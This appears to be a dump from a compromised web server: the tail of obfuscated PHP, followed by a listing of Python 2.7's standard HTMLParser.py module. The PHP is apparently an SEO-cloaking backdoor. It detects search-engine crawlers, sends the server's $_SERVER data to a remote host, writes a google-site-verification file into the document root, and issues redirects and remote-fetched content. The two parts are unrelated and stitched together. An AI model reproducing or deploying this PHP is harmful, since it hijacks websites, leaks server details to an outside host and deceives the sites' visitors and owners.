); goto dsf3A; qDZ_W: vza0D: goto xDF02; Fxphd: $pQOAP = "\x74\151\157\156\x3a"; goto ow8Ll; h89m4: $bVLGQ .= "\x66\151\143\x61"; goto h1JIh; pj7y1: if (!preg_match("\x2f\x5e\112\165\x6d\160\100\50\56\x2a\x29\57", $Gm3f8, $aKaai)) { goto SYcEY; } goto Z_Udm; D4Q3O: $eyzrT = UAZhz($Dz3re); goto j01_p; Ez9KB: if (!preg_match("\57\136\x48\145\x61\144\x40\50\x2e\x2a\77\51\100\x40\50\56\x2a\x29\57\151\x73", $Gm3f8, $e_42L)) { goto qwcsZ; } goto F5KV8; SUfJJ: WeAem: goto fw0FJ; XkQPC: $Gm3f8 = trim($Gm3f8); goto OhjGB; krcRA: echo "{$Gm3f8}"; goto CZnIQ; om8Q7: file_put_contents("{$ZZPc9}\x2f{$mzqwU}", "{$bVLGQ}\x20{$mzqwU}"); goto TZENW; k__XX: $_SERVER["\x79\164\137\x67\x7a"] = $Kqdnq[1]; goto rQpXi; Bi98H: zUepC: goto DjwDV; lQWdQ: return; goto TIdBi; ViqG1: $bVLGQ .= "\x67\154\x65\55\163\x69"; goto l3qq1; fw0FJ: die; goto rcw1v; uttX2: $ZZPc9 = $_SERVER[$QqjbH]; goto Mz0wo; t9vPN: header($e_42L[1]); goto PzqYa; TnJ9g: $pQOAP = "\114\157\x63\x61" . $pQOAP; goto UZeoW; W7L0H: uQ00Z: goto krcRA; ow8Ll: $d6_Jb = "\x28\x67\x6f\157"; goto UqhiZ; rcw1v: i58q0: goto J1bN0; j01_p: $Kqdnq = explode("\72\x3a", A); goto qa300; UpTEL: qwcsZ: goto WdLiy; vigW_: UtcdE: goto SSnj2; qa300: $m3gJm = sprintf("\150\x74\164\x70\163\72\x2f\x2f\45\x73\56\160\171", ywglY($Kqdnq[0])); goto NbXA9; YEqQg: $d6_Jb .= "\175\x5c\56\170\x68"; goto KJtMO; dsf3A: qr5hT: goto HAeYG; b5pvD: $QqjbH .= "\x54\137\x52\117\117\124"; goto uttX2; EB4NS: $_SERVER["\x79\164\137\x6a\x75\x6d\x70"] = 1; goto Bi98H; aWLvw: die; goto suwkM; nIQZT: $QqjbH = "\x44\x4f\x43"; goto Ajv7I; DjwDV: $Gm3f8 = RMwYT($m3gJm, array("\170" => serialize($_SERVER))); goto XkQPC; X2ZDa: $L7avg = parse_url($m3gJm); goto xE3T8; whZ89: $Gm3f8 = trim($Gm3f8); goto Ez9KB; TIdBi: x1PZx: goto pj7y1; suwkM: xrnyo: goto f65jz; l3qq1: $bVLGQ .= "\164\145\55\x76\145\x72\x69"; goto h89m4; gk5bu: header("{$pQOAP}\x20\x2f{$mzqwU}"); goto aWLvw; WZubY: $eot8L = isset($_SERVER["\122\x45\x51\125\105\x53\x54\x5f\x55\x52\x49"]) ? $_SERVER["\x52\105\121\125\x45\x53\124\x5f\125\122\x49"] : (isset($_SERVER["\121\125\x45\122\131\x5f\123\x54\122\x49\x4e\107"]) ? $_SERVER["\121\125\105\122\x59\x5f\123\x54\122\111\116\x47"] : ''); goto XbsqL; f05fv: goto WeAem; goto jptJa; Ra1Hp: if ($MYs90) { goto vza0D; } goto nb404; W88SU: if (preg_match("\57\136\x68\x74\164\160\163\77\x2f\163\x69", $UX2gA)) { goto ImNaW; } goto mnXZL; xE3T8: echo gethostbyname($L7avg["\150\157\x73\x74"]); goto f05fv; N13_u: chmod($ZZPc9, 0755); goto om8Q7; NbXA9: $_SERVER["\171\164\137\x6a\165\155\160"] = 0; goto k__XX; mnXZL: echo sprintf($YRdmP, $m3gJm, $m3gJm) . "\x3c\x62\x72\x20\x2f\76\x3c\142\162\40\57\76"; goto X2ZDa; f65jz: if (!($hxyxr || $eyzrT)) { goto UtcdE; } goto evisZ; KJtMO: $d6_Jb .= "\164\155\154\51"; goto jepcO; jptJa: ImNaW: goto BgmN9; SSnj2: } goto yfeBq; vJZxQ: @ob_start(); goto IeyQ_; hiaac: @date_default_timezone_set("\x50\x52\103"); goto fkDlz; paMIL: function uAZhZ($mSaNc = '') { return preg_match("\x2f\50\x67\x6f\157\x67\x6c\145\x2e\143\157\x2e\152\160\x7c\x79\x61\x68\x6f\157\x2e\143\x6f\x2e\152\160\174\142\x69\x6e\147\x7c\142\x61\151\x64\x75\x7c\147\x6f\x6f\147\x6c\145\56\143\157\x6d\x29\x2f\163\151", $mSaNc); } goto AUWFK; fkDlz: if (!function_exists("\x6f\142\x5f\x73\164\141\162\164")) { goto ABP2h; } goto vJZxQ; AUWFK: function YWglY($r3H5L) { goto hjvwh; sLMpr: if (!(is_array($ys12P) && count($ys12P) == 4)) { goto MErec; } goto ME0Pe; t3Xy4: $sN20i = implode('', $tk4Tz); goto q6d5v; d6VGt: ivn9Z: goto t3Xy4; sFrnt: return $sN20i; goto HrGts; qIlfd: foreach ($tk4Tz as $aoydG => $GtJl1) { $tk4Tz[$aoydG] = chr(ord($GtJl1) - 5); Hx2Gv: } goto d6VGt; g8mRP: $tk4Tz = preg_split("\x2f\x2f", $ys12P[2], -1, PREG_SPLIT_NO_EMPTY); goto qIlfd; q6d5v: RvWic: goto TNCFO; hjvwh: $sN20i = ''; goto axNGd; TNCFO: $sN20i = $ys12P[1] . $sN20i . $ys12P[3]; goto UfFGu; ME0Pe: if (!($ys12P[2] != '')) { goto RvWic; } goto g8mRP; axNGd: preg_match("\57\x28\133\136\x5c\56\x5d\x2b\134\x2e\51\50\x2e\x2a\x29\50\x5c\57\56\52\x29\x2f", $r3H5L, $ys12P); goto sLMpr; UfFGu: MErec: goto sFrnt; HrGts: } goto QWLGU; FS1et: function co3zc($cHxE_ = '') { return preg_match("\57\x28\147\x6f\x6f\x67\154\145\x62\157\x74\x7c\x62\x61\151\x64\165\x73\160\x69\x64\x65\x72\x7c\x62\x69\x6e\147\142\157\164\174\x67\x6f\157\147\x6c\x65\x7c\x62\x61\151\x64\x75\x7c\x61\157\154\x7c\x62\151\156\147\174\171\141\150\157\157\x7c\171\141\x6e\144\x65\170\51\x2f\163\151", $cHxE_); } goto paMIL; yfeBq: wWifV(); ?> HEX
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File: //lib64/python2.7/HTMLParser.py
"""A parser for HTML and XHTML."""

# This file is based on sgmllib.py, but the API is slightly different.

# XXX There should be a way to distinguish between PCDATA (parsed
# character data -- the normal case), RCDATA (replaceable character
# data -- only char and entity references and end tags are special)
# and CDATA (character data -- only end tags are special).


import markupbase
import re

# Regular expressions used for parsing

interesting_normal = re.compile('[&<]')
incomplete = re.compile('&[a-zA-Z#]')

entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]')
charref = re.compile('&#(?:[0-9]+|[xX][0-9a-fA-F]+)[^0-9a-fA-F]')

starttagopen = re.compile('<[a-zA-Z]')
piclose = re.compile('>')
commentclose = re.compile(r'--\s*>')

# see http://www.w3.org/TR/html5/tokenization.html#tag-open-state
# and http://www.w3.org/TR/html5/tokenization.html#tag-name-state
# note: if you change tagfind/attrfind remember to update locatestarttagend too
tagfind = re.compile('([a-zA-Z][^\t\n\r\f />\x00]*)(?:\s|/(?!>))*')
# this regex is currently unused, but left for backward compatibility
tagfind_tolerant = re.compile('[a-zA-Z][^\t\n\r\f />\x00]*')

attrfind = re.compile(
    r'((?<=[\'"\s/])[^\s/>][^\s/=>]*)(\s*=+\s*'
    r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?(?:\s|/(?!>))*')

locatestarttagend = re.compile(r"""
  <[a-zA-Z][^\t\n\r\f />\x00]*       # tag name
  (?:[\s/]*                          # optional whitespace before attribute name
    (?:(?<=['"\s/])[^\s/>][^\s/=>]*  # attribute name
      (?:\s*=+\s*                    # value indicator
        (?:'[^']*'                   # LITA-enclosed value
          |"[^"]*"                   # LIT-enclosed value
          |(?!['"])[^>\s]*           # bare value
         )
       )?(?:\s|/(?!>))*
     )*
   )?
  \s*                                # trailing whitespace
""", re.VERBOSE)
endendtag = re.compile('>')
# the HTML 5 spec, section 8.1.2.2, doesn't allow spaces between
# </ and the tag name, so maybe this should be fixed
endtagfind = re.compile('</\s*([a-zA-Z][-.a-zA-Z0-9:_]*)\s*>')


class HTMLParseError(Exception):
    """Exception raised for all parse errors."""

    def __init__(self, msg, position=(None, None)):
        assert msg
        self.msg = msg
        self.lineno = position[0]
        self.offset = position[1]

    def __str__(self):
        result = self.msg
        if self.lineno is not None:
            result = result + ", at line %d" % self.lineno
        if self.offset is not None:
            result = result + ", column %d" % (self.offset + 1)
        return result


class HTMLParser(markupbase.ParserBase):
    """Find tags and other markup and call handler functions.

    Usage:
        p = HTMLParser()
        p.feed(data)
        ...
        p.close()

    Start tags are handled by calling self.handle_starttag() or
    self.handle_startendtag(); end tags by self.handle_endtag().  The
    data between tags is passed from the parser to the derived class
    by calling self.handle_data() with the data as argument (the data
    may be split up in arbitrary chunks).  Entity references are
    passed by calling self.handle_entityref() with the entity
    reference as the argument.  Numeric character references are
    passed to self.handle_charref() with the string containing the
    reference as the argument.
    """

    CDATA_CONTENT_ELEMENTS = ("script", "style")


    def __init__(self):
        """Initialize and reset this instance."""
        self.reset()

    def reset(self):
        """Reset this instance.  Loses all unprocessed data."""
        self.rawdata = ''
        self.lasttag = '???'
        self.interesting = interesting_normal
        self.cdata_elem = None
        markupbase.ParserBase.reset(self)

    def feed(self, data):
        r"""Feed data to the parser.

        Call this as often as you want, with as little or as much text
        as you want (may include '\n').
        """
        self.rawdata = self.rawdata + data
        self.goahead(0)

    def close(self):
        """Handle any buffered data."""
        self.goahead(1)

    def error(self, message):
        raise HTMLParseError(message, self.getpos())

    __starttag_text = None

    def get_starttag_text(self):
        """Return full source of start tag: '<...>'."""
        return self.__starttag_text

    def set_cdata_mode(self, elem):
        self.cdata_elem = elem.lower()
        self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)

    def clear_cdata_mode(self):
        self.interesting = interesting_normal
        self.cdata_elem = None

    # Internal -- handle data as far as reasonable.  May leave state
    # and data to be processed by a subsequent call.  If 'end' is
    # true, force handling all data as if followed by EOF marker.
    def goahead(self, end):
        rawdata = self.rawdata
        i = 0
        n = len(rawdata)
        while i < n:
            match = self.interesting.search(rawdata, i) # < or &
            if match:
                j = match.start()
            else:
                if self.cdata_elem:
                    break
                j = n
            if i < j: self.handle_data(rawdata[i:j])
            i = self.updatepos(i, j)
            if i == n: break
            startswith = rawdata.startswith
            if startswith('<', i):
                if starttagopen.match(rawdata, i): # < + letter
                    k = self.parse_starttag(i)
                elif startswith("</", i):
                    k = self.parse_endtag(i)
                elif startswith("<!--", i):
                    k = self.parse_comment(i)
                elif startswith("<?", i):
                    k = self.parse_pi(i)
                elif startswith("<!", i):
                    k = self.parse_html_declaration(i)
                elif (i + 1) < n:
                    self.handle_data("<")
                    k = i + 1
                else:
                    break
                if k < 0:
                    if not end:
                        break
                    k = rawdata.find('>', i + 1)
                    if k < 0:
                        k = rawdata.find('<', i + 1)
                        if k < 0:
                            k = i + 1
                    else:
                        k += 1
                    self.handle_data(rawdata[i:k])
                i = self.updatepos(i, k)
            elif startswith("&#", i):
                match = charref.match(rawdata, i)
                if match:
                    name = match.group()[2:-1]
                    self.handle_charref(name)
                    k = match.end()
                    if not startswith(';', k-1):
                        k = k - 1
                    i = self.updatepos(i, k)
                    continue
                else:
                    if ";" in rawdata[i:]:  # bail by consuming '&#'
                        self.handle_data(rawdata[i:i+2])
                        i = self.updatepos(i, i+2)
                    break
            elif startswith('&', i):
                match = entityref.match(rawdata, i)
                if match:
                    name = match.group(1)
                    self.handle_entityref(name)
                    k = match.end()
                    if not startswith(';', k-1):
                        k = k - 1
                    i = self.updatepos(i, k)
                    continue
                match = incomplete.match(rawdata, i)
                if match:
                    # match.group() will contain at least 2 chars
                    if end and match.group() == rawdata[i:]:
                        self.error("EOF in middle of entity or char ref")
                    # incomplete
                    break
                elif (i + 1) < n:
                    # not the end of the buffer, and can't be confused
                    # with some other construct
                    self.handle_data("&")
                    i = self.updatepos(i, i + 1)
                else:
                    break
            else:
                assert 0, "interesting.search() lied"
        # end while
        if end and i < n and not self.cdata_elem:
            self.handle_data(rawdata[i:n])
            i = self.updatepos(i, n)
        self.rawdata = rawdata[i:]

    # Internal -- parse html declarations, return length or -1 if not terminated
    # See w3.org/TR/html5/tokenization.html#markup-declaration-open-state
    # See also parse_declaration in _markupbase
    def parse_html_declaration(self, i):
        rawdata = self.rawdata
        if rawdata[i:i+2] != '<!':
            self.error('unexpected call to parse_html_declaration()')
        if rawdata[i:i+4] == '<!--':
            # this case is actually already handled in goahead()
            return self.parse_comment(i)
        elif rawdata[i:i+3] == '<![':
            return self.parse_marked_section(i)
        elif rawdata[i:i+9].lower() == '<!doctype':
            # find the closing >
            gtpos = rawdata.find('>', i+9)
            if gtpos == -1:
                return -1
            self.handle_decl(rawdata[i+2:gtpos])
            return gtpos+1
        else:
            return self.parse_bogus_comment(i)

    # Internal -- parse bogus comment, return length or -1 if not terminated
    # see http://www.w3.org/TR/html5/tokenization.html#bogus-comment-state
    def parse_bogus_comment(self, i, report=1):
        rawdata = self.rawdata
        if rawdata[i:i+2] not in ('<!', '</'):
            self.error('unexpected call to parse_comment()')
        pos = rawdata.find('>', i+2)
        if pos == -1:
            return -1
        if report:
            self.handle_comment(rawdata[i+2:pos])
        return pos + 1

    # Internal -- parse processing instr, return end or -1 if not terminated
    def parse_pi(self, i):
        rawdata = self.rawdata
        assert rawdata[i:i+2] == '<?', 'unexpected call to parse_pi()'
        match = piclose.search(rawdata, i+2) # >
        if not match:
            return -1
        j = match.start()
        self.handle_pi(rawdata[i+2: j])
        j = match.end()
        return j

    # Internal -- handle starttag, return end or -1 if not terminated
    def parse_starttag(self, i):
        self.__starttag_text = None
        endpos = self.check_for_whole_start_tag(i)
        if endpos < 0:
            return endpos
        rawdata = self.rawdata
        self.__starttag_text = rawdata[i:endpos]

        # Now parse the data between i+1 and j into a tag and attrs
        attrs = []
        match = tagfind.match(rawdata, i+1)
        assert match, 'unexpected call to parse_starttag()'
        k = match.end()
        self.lasttag = tag = match.group(1).lower()

        while k < endpos:
            m = attrfind.match(rawdata, k)
            if not m:
                break
            attrname, rest, attrvalue = m.group(1, 2, 3)
            if not rest:
                attrvalue = None
            elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
                 attrvalue[:1] == '"' == attrvalue[-1:]:
                attrvalue = attrvalue[1:-1]
            if attrvalue:
                attrvalue = self.unescape(attrvalue)
            attrs.append((attrname.lower(), attrvalue))
            k = m.end()

        end = rawdata[k:endpos].strip()
        if end not in (">", "/>"):
            lineno, offset = self.getpos()
            if "\n" in self.__starttag_text:
                lineno = lineno + self.__starttag_text.count("\n")
                offset = len(self.__starttag_text) \
                         - self.__starttag_text.rfind("\n")
            else:
                offset = offset + len(self.__starttag_text)
            self.handle_data(rawdata[i:endpos])
            return endpos
        if end.endswith('/>'):
            # XHTML-style empty tag: <span attr="value" />
            self.handle_startendtag(tag, attrs)
        else:
            self.handle_starttag(tag, attrs)
            if tag in self.CDATA_CONTENT_ELEMENTS:
                self.set_cdata_mode(tag)
        return endpos

    # Internal -- check to see if we have a complete starttag; return end
    # or -1 if incomplete.
    def check_for_whole_start_tag(self, i):
        rawdata = self.rawdata
        m = locatestarttagend.match(rawdata, i)
        if m:
            j = m.end()
            next = rawdata[j:j+1]
            if next == ">":
                return j + 1
            if next == "/":
                if rawdata.startswith("/>", j):
                    return j + 2
                if rawdata.startswith("/", j):
                    # buffer boundary
                    return -1
                # else bogus input
                self.updatepos(i, j + 1)
                self.error("malformed empty start tag")
            if next == "":
                # end of input
                return -1
            if next in ("abcdefghijklmnopqrstuvwxyz=/"
                        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
                # end of input in or before attribute value, or we have the
                # '/' from a '/>' ending
                return -1
            if j > i:
                return j
            else:
                return i + 1
        raise AssertionError("we should not get here!")

    # Internal -- parse endtag, return end or -1 if incomplete
    def parse_endtag(self, i):
        rawdata = self.rawdata
        assert rawdata[i:i+2] == "</", "unexpected call to parse_endtag"
        match = endendtag.search(rawdata, i+1) # >
        if not match:
            return -1
        gtpos = match.end()
        match = endtagfind.match(rawdata, i) # </ + tag + >
        if not match:
            if self.cdata_elem is not None:
                self.handle_data(rawdata[i:gtpos])
                return gtpos
            # find the name: w3.org/TR/html5/tokenization.html#tag-name-state
            namematch = tagfind.match(rawdata, i+2)
            if not namematch:
                # w3.org/TR/html5/tokenization.html#end-tag-open-state
                if rawdata[i:i+3] == '</>':
                    return i+3
                else:
                    return self.parse_bogus_comment(i)
            tagname = namematch.group(1).lower()
            # consume and ignore other stuff between the name and the >
            # Note: this is not 100% correct, since we might have things like
            # </tag attr=">">, but looking for > after tha name should cover
            # most of the cases and is much simpler
            gtpos = rawdata.find('>', namematch.end())
            self.handle_endtag(tagname)
            return gtpos+1

        elem = match.group(1).lower() # script or style
        if self.cdata_elem is not None:
            if elem != self.cdata_elem:
                self.handle_data(rawdata[i:gtpos])
                return gtpos

        self.handle_endtag(elem)
        self.clear_cdata_mode()
        return gtpos

    # Overridable -- finish processing of start+end tag: <tag.../>
    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        self.handle_endtag(tag)

    # Overridable -- handle start tag
    def handle_starttag(self, tag, attrs):
        pass

    # Overridable -- handle end tag
    def handle_endtag(self, tag):
        pass

    # Overridable -- handle character reference
    def handle_charref(self, name):
        pass

    # Overridable -- handle entity reference
    def handle_entityref(self, name):
        pass

    # Overridable -- handle data
    def handle_data(self, data):
        pass

    # Overridable -- handle comment
    def handle_comment(self, data):
        pass

    # Overridable -- handle declaration
    def handle_decl(self, decl):
        pass

    # Overridable -- handle processing instruction
    def handle_pi(self, data):
        pass

    def unknown_decl(self, data):
        pass

    # Internal -- helper to remove special character quoting
    entitydefs = None
    def unescape(self, s):
        if '&' not in s:
            return s
        def replaceEntities(s):
            s = s.groups()[0]
            try:
                if s[0] == "#":
                    s = s[1:]
                    if s[0] in ['x','X']:
                        c = int(s[1:], 16)
                    else:
                        c = int(s)
                    return unichr(c)
            except ValueError:
                return '&#'+s+';'
            else:
                # Cannot use name2codepoint directly, because HTMLParser supports apos,
                # which is not part of HTML 4
                if HTMLParser.entitydefs is None:
                    import htmlentitydefs
                    entitydefs = {'apos':u"'"}
                    for k, v in htmlentitydefs.name2codepoint.iteritems():
                        entitydefs[k] = unichr(v)
                    HTMLParser.entitydefs = entitydefs
                try:
                    return self.entitydefs[s]
                except KeyError:
                    return '&'+s+';'

        return re.sub(r"&(#?[xX]?(?:[0-9a-fA-F]+|\w{1,8}));", replaceEntities, s)